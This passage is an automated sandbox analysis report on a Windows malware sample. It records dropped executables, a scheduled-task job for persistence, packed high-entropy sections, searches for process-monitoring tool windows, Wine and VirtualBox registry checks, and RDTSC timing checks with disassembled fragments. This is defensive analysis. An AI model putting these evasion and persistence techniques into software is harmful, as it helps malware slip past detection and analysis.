Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: XO4ioEY3nq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: XO4ioEY3nq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: XO4ioEY3nq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: XO4ioEY3nq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: XO4ioEY3nq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: XO4ioEY3nq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: XO4ioEY3nq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: XO4ioEY3nq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: XO4ioEY3nq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: XO4ioEY3nq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: XO4ioEY3nq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: XO4ioEY3nq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: XO4ioEY3nq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Unpacked PE file: 4.2.rundrive.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vonkwwrp:EW;axkanahc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vonkwwrp:EW;axkanahc:EW;.taggant:EW;
Source: C:\ProgramData\rcjuo\eafkou.exe	Unpacked PE file: 5.2.eafkou.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vonkwwrp:EW;axkanahc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vonkwwrp:EW;axkanahc:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: XO4ioEY3nq.exe	Static PE information: real checksum: 0x0 should be: 0x8038a
Source: rundrive.exe.1.dr	Static PE information: real checksum: 0x1bacf5 should be: 0x1b7b92
Source: rundrive[1].exe.1.dr	Static PE information: real checksum: 0x1bacf5 should be: 0x1b7b92
Source: eafkou.exe.4.dr	Static PE information: real checksum: 0x1bacf5 should be: 0x1b7b92
Source: Gxtuum.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x8038a

Source: rundrive[1].exe.1.dr	Static PE information: section name:
Source: rundrive[1].exe.1.dr	Static PE information: section name: .idata
Source: rundrive[1].exe.1.dr	Static PE information: section name:
Source: rundrive[1].exe.1.dr	Static PE information: section name: vonkwwrp
Source: rundrive[1].exe.1.dr	Static PE information: section name: axkanahc
Source: rundrive[1].exe.1.dr	Static PE information: section name: .taggant
Source: rundrive.exe.1.dr	Static PE information: section name:
Source: rundrive.exe.1.dr	Static PE information: section name: .idata
Source: rundrive.exe.1.dr	Static PE information: section name:
Source: rundrive.exe.1.dr	Static PE information: section name: vonkwwrp
Source: rundrive.exe.1.dr	Static PE information: section name: axkanahc
Source: rundrive.exe.1.dr	Static PE information: section name: .taggant
Source: eafkou.exe.4.dr	Static PE information: section name:
Source: eafkou.exe.4.dr	Static PE information: section name: .idata
Source: eafkou.exe.4.dr	Static PE information: section name:
Source: eafkou.exe.4.dr	Static PE information: section name: vonkwwrp
Source: eafkou.exe.4.dr	Static PE information: section name: axkanahc
Source: eafkou.exe.4.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_0009A063 push ecx; ret	0_2_0009A076
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000872EF pushad ; iretd	0_2_000872F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008FA063 push ecx; ret	1_2_008FA076
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008E72EF pushad ; iretd	1_2_008E72F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008FA063 push ecx; ret	2_2_008FA076
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008E72EF pushad ; iretd	2_2_008E72F0

Source: rundrive[1].exe.1.dr	Static PE information: section name: entropy: 7.810542589941846
Source: rundrive[1].exe.1.dr	Static PE information: section name: vonkwwrp entropy: 7.951882985850609
Source: rundrive.exe.1.dr	Static PE information: section name: entropy: 7.810542589941846
Source: rundrive.exe.1.dr	Static PE information: section name: vonkwwrp entropy: 7.951882985850609
Source: eafkou.exe.4.dr	Static PE information: section name: entropy: 7.810542589941846
Source: eafkou.exe.4.dr	Static PE information: section name: vonkwwrp entropy: 7.951882985850609

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	File created: C:\ProgramData\rcjuo\eafkou.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	File created: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\rundrive[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	File created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe

File created: C:\ProgramData\rcjuo\eafkou.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

File created: C:\Windows\Tasks\Gxtuum.job

Jump to behavior

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_0009918F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0009918F

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 40BCF0 second address: 40BCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 40BCF5 second address: 40BCFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 58DB92 second address: 58DB9C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C00876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 58DB9C second address: 58DBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FDA80C026C2h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 58DBB4 second address: 58DBD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00888h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 58DE46 second address: 58DE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FDA80C026C8h 0x0000000b jmp 00007FDA80C026BEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 58DE75 second address: 58DE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 590F62 second address: 590F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FDA80C026B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 590F6C second address: 590F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDA80C0087Bh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 590F94 second address: 590F99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 590FE7 second address: 591006 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FDA80C0087Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 591006 second address: 591010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FDA80C026B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5910CE second address: 5910DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jc 00007FDA80C00884h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5910DF second address: 5910E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5910E3 second address: 591135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edi 0x0000000b jmp 00007FDA80C00887h 0x00000010 pop edi 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FDA80C00886h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d jmp 00007FDA80C0087Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 591135 second address: 59118D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FDA80C026B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 pushad 0x00000023 add dx, 0A5Ah 0x00000028 mov dword ptr [ebp+122D1A9Ch], ecx 0x0000002e popad 0x0000002f lea ebx, dword ptr [ebp+12458E61h] 0x00000035 mov cx, EBF0h 0x00000039 mov dword ptr [ebp+122D1A9Ch], ebx 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FDA80C026C3h 0x00000048 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 591278 second address: 59127C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 59127C second address: 5912FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 55386B14h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FDA80C026B8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 or ecx, dword ptr [ebp+122D1A21h] 0x0000002e push 00000003h 0x00000030 mov cx, ax 0x00000033 push 00000000h 0x00000035 mov ecx, 03B80F00h 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FDA80C026B8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov ecx, dword ptr [ebp+122D38A8h] 0x0000005c push eax 0x0000005d mov edi, dword ptr [ebp+122D1F0Eh] 0x00000063 pop ecx 0x00000064 push 99CF73A9h 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FDA80C026BAh 0x00000071 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5913D4 second address: 5913D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5913D8 second address: 5913DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5913DC second address: 591474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov si, 196Ch 0x0000000e push 00000000h 0x00000010 sub dword ptr [ebp+122D320Bh], edi 0x00000016 push 310BAE04h 0x0000001b jg 00007FDA80C00888h 0x00000021 jmp 00007FDA80C00882h 0x00000026 xor dword ptr [esp], 310BAE84h 0x0000002d call 00007FDA80C00887h 0x00000032 mov cl, CCh 0x00000034 pop esi 0x00000035 push 00000003h 0x00000037 push 00000000h 0x00000039 jmp 00007FDA80C0087Fh 0x0000003e push 00000003h 0x00000040 mov edx, 618F6CE6h 0x00000045 call 00007FDA80C00879h 0x0000004a push esi 0x0000004b jbe 00007FDA80C00878h 0x00000051 push ecx 0x00000052 pop ecx 0x00000053 pop esi 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 jmp 00007FDA80C00882h 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 591474 second address: 5914B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d jg 00007FDA80C026BCh 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [eax] 0x00000016 jnc 00007FDA80C026BEh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDA80C026C2h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5914B6 second address: 5914C0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA80C0087Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5A2E5E second address: 5A2E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5A2E63 second address: 5A2E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 577D39 second address: 577D58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDA80C026C8h 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5AF86E second address: 5AF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5AF874 second address: 5AF88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FDA80C026B6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5AF88B second address: 5AF88F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5AF88F second address: 5AF89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5AFDB8 second address: 5AFDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5AFF39 second address: 5AFF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5B008B second address: 5B008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5B008F second address: 5B0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5B0E10 second address: 5B0E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
